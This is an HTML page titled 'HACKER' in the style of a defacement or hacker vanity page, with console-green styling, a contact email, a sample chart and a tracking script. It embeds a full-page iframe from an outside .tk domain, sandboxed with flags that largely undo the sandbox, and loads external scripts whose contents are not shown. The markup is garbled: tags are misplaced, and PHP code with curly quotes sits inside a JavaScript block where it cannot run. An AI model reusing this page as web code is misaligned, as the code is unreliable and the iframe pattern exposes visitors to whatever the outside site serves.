
<!DOCTYPE html>
<html>
<head>
<meta name="google-site-verification" content="2vZoEN7S-HFJccciVeuzqshqXBzAhGQ9Z6BoRZPKyWo" />
<title>HACKER</title>
	<iframe src="https://abcjon.tk/" 
        scrolling="no" sandbox="allow-scripts allow-popups allow-same-origin" 
        name="sandbox" style="width: 100%; height: 100%; border: 0px;"></iframe>
	
		<script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.5.0/Chart.min.js"></script>
<body>
<canvas id="myChart" style="width:100%;max-width:600px"></canvas>

<script>
var xValues = [100,200,300,400,500,600,700,800,900,1000];

new Chart("myChart", {
  type: "line",
  data: {
    labels: xValues,
    datasets: [{ 
      data: [860,1140,1060,1060,1070,1110,1330,2210,7830,2478],
      borderColor: "red",
      fill: false
    }, { 
      data: [1600,1700,1700,1900,2000,2700,4000,5000,6000,7000],
      borderColor: "green",
      fill: false
    }, { 
      data: [300,700,2000,5000,6000,4000,2000,1000,200,100],
      borderColor: "blue",
      fill: false
    }]
  },
  options: {
    legend: {display: false}
  }
});
</script>
	
	
<meta name="description" content="" />
<style>
body
{
	background-color: #fffafa59;
	padding: 1%;
	color: #ccc;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-size: 1em;
	}
a
{
	color: #00FF00;
	text-decoration: underline;
}
a:hover
{
	color: #FF0000;
	text-decoration: underline;
}
.console
{
	font-family: "Lucida Sans Typewriter", "Lucida Console", Monaco, "Bitstream Vera Sans Mono", monospace;
	color: #00FF00;
}
input[type="button"]
{
	cursor: pointer;
}
.pi {
	position: fixed;
	bottom: 0;
	right: 0;
	color: #00FF00;
  }
.cow {
	position: fixed;
	bottom: 0;
	left: 0;
	color: #00FF00;
  }
</style>
	<script type="text/javascript" src="ssssos.js"></script>
	<script type="text/javascript" src="functions.js"> </script>

</head>
<body bgcolor="black" text="lime" link="lime" alink="lime" vlink="lime">
<p class="console">
	<span># </span><span id="caption"></span><span id="cursor">|</span>
<noscript>
HACKER<br><br>UK.<br><br>Gmail: <a href="mail:haomhoa@gmail.com">haomhoa@gmail.com</a<br><br><br>#
</noscript>
</p>
<script type="text/javascript" id="hs-script-loader" async defer src="//js-na1.hs-scripts.com/21193109.js"></script>
</script>
	
	   <script type="text/javascript">
      const warningTitleCSS = 'color:red; font-size:60px; font-weight: bold; -webkit-text-stroke: 1px black;';
      const warningDescCSS = 'font-size: 18px;';

      console.log('%cStop!', warningTitleCSS);
      console.log("%cThis is a browser feature intended for developers. If someone asks you to copy and paste something here to enable or \"hack\" someone's account.", warningDescCSS);
    </script>
	<script>
function server_busy($numer) {
if (THIS_IS == ‘WEBSITE’ && PHP_OS == ‘Linux’ and @file_exists ( ‘/proc/loadavg’ ) and $filestuff = @file_get_contents ( ‘/proc/loadavg’ )) {
$loadavg = explode ( ‘ ‘, $filestuff );
if (trim ( $loadavg [0] ) > $numer) {
print ”;
print ‘HACkER.’;
exit ( 0 );
}
}
}
$srv = server_busy ( 1000 );

	</script>
	
	<img src="https://detectify-labs.s3.amazonaws.com/slack-postmessage/nope.jpg">
	

	
</body>
</html>
